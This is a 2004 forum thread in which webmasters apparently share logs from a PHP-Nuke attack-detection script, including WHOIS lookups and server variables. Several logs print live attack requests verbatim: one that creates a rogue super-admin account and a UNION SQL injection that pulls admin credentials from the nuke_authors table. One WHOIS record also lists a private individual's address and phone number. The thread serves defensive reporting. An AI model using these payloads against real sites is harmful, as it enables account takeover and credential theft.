| Author |
Message |
sharlein
Member Emeritus
Joined: Nov 19, 2002
Posts: 322
Location: On the Road
|
 Posted:
Wed Mar 31, 2004 9:58 am |
 
|
| Quote: | 80.55.93.226
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer:
NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate:
Updated: 2004-03-16
OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail:
DOCUMENT_ROOT :public_html
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/msword, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pl
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
PATH : /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin
REMOTE_ADDR : 80.55.93.226
REMOTE_PORT : 1864
SCRIPT_FILENAME : html/hackattempt.php
SERVER_ADDR :
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT :
SERVER_SIGNATURE : Apache/1.3.29 Server at Port 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 PHP/4.3.3 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
REQUEST_URI : /Nuke/html/hackattempt.php?op=AddAuthor&add_aid=attacker&add_name=God&add_pwd=coolpass&add_email=kala%20hot%20ee&add_radminsuper=1
SCRIPT_NAME : html/hackattempt.php
PATH_TRANSLATED : html/hackattempt.php
PHP_SELF : html/hackattempt.php
argv : Array
argc : 1
|
|
|
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1156
Location: Sanbornton, NH USA
|
| Posted:
Mon Apr 05, 2004 12:27 am |
|
This one busted by RavenScript Tonight.
The Proxy reported by the Script was:
| Quote: | 80.80.128.163
OrgName: RIPE Network Coordination Centre
OrgID: RIPE
Address: Singel 258
Address: 1016 AB
City: Amsterdam
StateProv:
PostalCode:
Country: NL
ReferralServer:
NetRange: 80.0.0.0 - 80.255.255.255
CIDR: 80.0.0.0/8
NetName: 80-RIPE
NetHandle: NET-80-0-0-0-1
Parent:
NetType: Allocated to RIPE NCC
NameServer: NS-PRI.RIPE.NET
NameServer: NS3.NIC.FR
NameServer: SUNIC.SUNET.SE
NameServer: AUTH62.NS.UU.NET
NameServer: SEC1.APNIC.NET
NameServer: SEC3.APNIC.NET
NameServer: TINNIE.ARIN.NET
Comment: These addresses have been further assigned to users in
Comment: the RIPE NCC region. Contact information can be found in
Comment: the RIPE database at
RegDate:
Updated: 2004-03-16
OrgTechHandle: RIPE-NCC-ARIN
OrgTechName: RIPE NCC Hostmaster
OrgTechPhone: +31 20 535 4444
OrgTechEmail:
HTTP_X_FORWARDED_FOR : 80.80.133.68
REMOTE_ADDR : 80.80.128.163
REMOTE_PORT : 53987 SCRIPT_FILENAME : /hackattempt.php
SERVER_NAME :
SERVER_PORT : 80
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
|
A closer look at the IP address forwarded by the Proxy in this attack (80.80.133.68) revealed:
| Quote: |
inetnum: 80.80.133.64 - 80.80.133.95
netname: ANGELSOFT-FORCE
descr: Force computer club IP addresses
country: BG
admin-c: STB1-RIPE
tech-c: AN767-RIPE
status: ASSIGNED PA
notify:
mnt-by: AS12829-MNT
changed: 20011101
source: RIPE
route: 80.80.132.0/22
descr: Angelsoft's clients aggregated route
origin: AS12829
notify:
notify:
mnt-by: AS12829-MNT
changed: 20020724
source: RIPE
role: Angelsoft NOC
address: 5 Kostaki Peev Str.
address: Plovdiv 4000
address: Bulgaria
phone: +359 32 635 211
fax-no: +359 32 638 209
e-mail:
e-mail:
trouble: visit
trouble: voice:
trouble: +359 32 635 211
trouble: +359 32 638 209
admin-c: AG5443-RIPE
tech-c: AY279-RIPE
nic-hdl: AN767-RIPE
remarks: This role object holds the handles of
remarks: supporting staff of AngelSoft ET
remarks: 5 Kostaki Peev Str.
remarks: Plovdiv
remarks: Bulgaria
notify:
mnt-by: AS12829-MNT
changed: 20010712
changed: 20020919
changed: 20030425
source: RIPE
person: Smilen Todorov Botev
address: 21 "Stoian Sredev"
address: Saedinenie
address: Plovdiv area
address: Bulgaria
phone: +359 88 964 794
e-mail:
nic-hdl: STB1-RIPE
notify:
notify:
changed: 20011101
source: RIPE |
|
Last edited by 64bitguy on Thu Apr 08, 2004 6:05 pm; edited 3 times in total |
|
|
|
64bitguy
The Mouse Is Extension Of Arm
Joined: Mar 06, 2004
Posts: 1156
Location: Sanbornton, NH USA
|
| Posted:
Thu Apr 08, 2004 6:02 pm |
|
Busted 217.219.75.92 / 216.148.246.70
| Quote: | OrgName: CERFnet
OrgID: CERF
Address: 5738 Pacific Center Blvd
City: San Diego
StateProv: CA
PostalCode: 92121
Country: US
NetRange: 216.148.0.0 - 216.148.255.255
CIDR: 216.148.0.0/16
NetName: CERFNET-BLK-4
NetHandle: NET-216-148-0-0-1
Parent: NET-216-0-0-0-0
NetType: Direct Allocation
NameServer: DBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: CBRU.BR.NS.ELS-GMS.ATT.NET
NameServer: DMTU.MT.NS.ELS-GMS.ATT.NET
NameServer: CMTU.MT.NS.ELS-GMS.ATT.NET
Comment: ADDRESSES WITHIN THIS BLOCK ARE NON-PORTABLE
RegDate: 1998-12-03
Updated: 2000-03-09
TechHandle: CERF-HM-ARIN
TechName: AT&T Enhanced Network Services
TechPhone: +1-858-812-5000
TechEmail:
OrgTechHandle: NETWO10-ARIN
OrgTechName: Network Provisioning
OrgTechPhone: +1-800-876-2373
OrgTechEmail:
HTTP_VIA : 1.1 cssj3prx02.marketscore.com (NGP Diatom vfc3), 1.0 cssj3che01 (NetCache NetApp/5.2.1R1)
HTTP_X_FORWARDED_FOR : 217.219.75.92, 10.101.3.111
REMOTE_ADDR : 216.148.246.70
REMOTE_PORT : 20409 SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
|
|
|
|
|
|
|
HauntedWebby
Involved
Joined: May 19, 2004
Posts: 363
Location: Ogden, UT
|
| Posted:
Thu May 20, 2004 9:56 am |
|
Ravan caught one for me - May 19, 2004 10:19PM (MST)
| Quote: | 201.5.225.38
OrgName: Latin American and Caribbean IP address Regional Registry
OrgID: LACNIC
Address: Potosi 1517
City: Montevideo
StateProv:
PostalCode: 11500
Country: UY
ReferralServer:
NetRange: 201.0.0.0 - 201.255.255.255
CIDR: 201.0.0.0/8
NetName: LACNIC-201
NetHandle: NET-201-0-0-0-1
Parent:
NetType: Allocated to LACNIC
NameServer: NS.LACNIC.NET
NameServer: NS2.DNS.BR
NameServer: TINNIE.ARIN.NET
NameServer: NS-SEC.RIPE.NET
NameServer: SEC3.APNIC.NET
Comment: This IP address range is under LACNIC responsibility
Comment: for further allocations to users in LACNIC region.
Comment: Please see for further details,
Comment: or check the WHOIS server located at whois.lacnic.net
RegDate: 2003-04-03
Updated: 2004-03-18
OrgTechHandle: LACNIC-ARIN
OrgTechName: LACNIC Hostmaster
OrgTechPhone: (+55) 11 5509-3522
OrgTechEmail:
PATH : /usr/local/bin:/usr/bin:/bin
DOCUMENT_ROOT : /h*/l*/p*
HTTP_ACCEPT : image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*
HTTP_ACCEPT_ENCODING : gzip, deflate
HTTP_ACCEPT_LANGUAGE : pt-br
HTTP_CONNECTION : Keep-Alive
HTTP_COOKIE : lang=english; msa_resolution=1024x768x32
HTTP_HOST :
HTTP_USER_AGENT : Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
REMOTE_ADDR : 201.5.225.38
REMOTE_PORT : 1369
SCRIPT_FILENAME : /h*/l*/p*/hackattempt.php
SERVER_ADDR : 66.**.2**.73
SERVER_ADMIN :
SERVER_NAME :
SERVER_PORT : 80
SERVER_SOFTWARE : Apache/1.3.29 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2634 mod_ssl/2.8.16 OpenSSL/0.9.7a PHP-CGI/0.1b
GATEWAY_INTERFACE : CGI/1.1
SERVER_PROTOCOL : HTTP/1.1
REQUEST_METHOD : GET
QUERY_STRING : name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
REQUEST_URI : /hackattempt.php?name=nukejokes&file=print&jokeid=-1/**/union/**/select/**/aid,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/**/limit/**/1/*
SCRIPT_NAME : /hackattempt.php
PHP_SELF : /hackattempt.php
argv : Array
argc : 1
|
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16986
Location: Kansas
|
| Posted:
Thu May 20, 2004 10:40 am |
|
|
 
|
|
jamesmc
New Member
Joined: Dec 22, 2003
Posts: 21
|
| Posted:
Tue Jun 01, 2004 6:13 am |
|
My site was hacked this weekend despite the script being in place and operational (tested as per Ravens Readme file). They must have found another way in. How I don't know as no report was generated and emailed.
Plastered all over the place was: ‘This Sait Hacked by Leroy Security Team’
Wouldn't be so bad of they could at least Spell!!
Are there any other security enhancements that you guys can recommend?
regards
James Mc |
|
|
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 16986
Location: Kansas
|
| Posted:
Tue Jun 01, 2004 6:27 am |
|
This hack alert script is strictly for the UNION type attacks. Unless you have installed Chatserv's security fixes then you have been and are at risk. However, this script has been supplanted by Sentinel(tm) which is a comprehensive security application. You should install Sentinel immediately and then check your logs to discover what method the hackers used. |
|
|
|
|
|
HauntedWebby
Involved
Joined: May 19, 2004
Posts: 363
Location: Ogden, UT
|
| Posted:
Tue Jun 01, 2004 9:47 am |
|
I have all three (this script, chatserv & sentenal) and I went from being hacked once a week to not seeing anything. |
|
|
|
|
|
jamesmc
New Member
Joined: Dec 22, 2003
Posts: 21
|
| Posted:
Tue Jun 01, 2004 4:34 pm |
|
Hi Raven
Thanks for the input. Much appreciated.
Keep up the good work..
regards
James Mc |
|
|
|
|
|
|
|
|
|
![[Valid RSS]](http://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
:: 
::
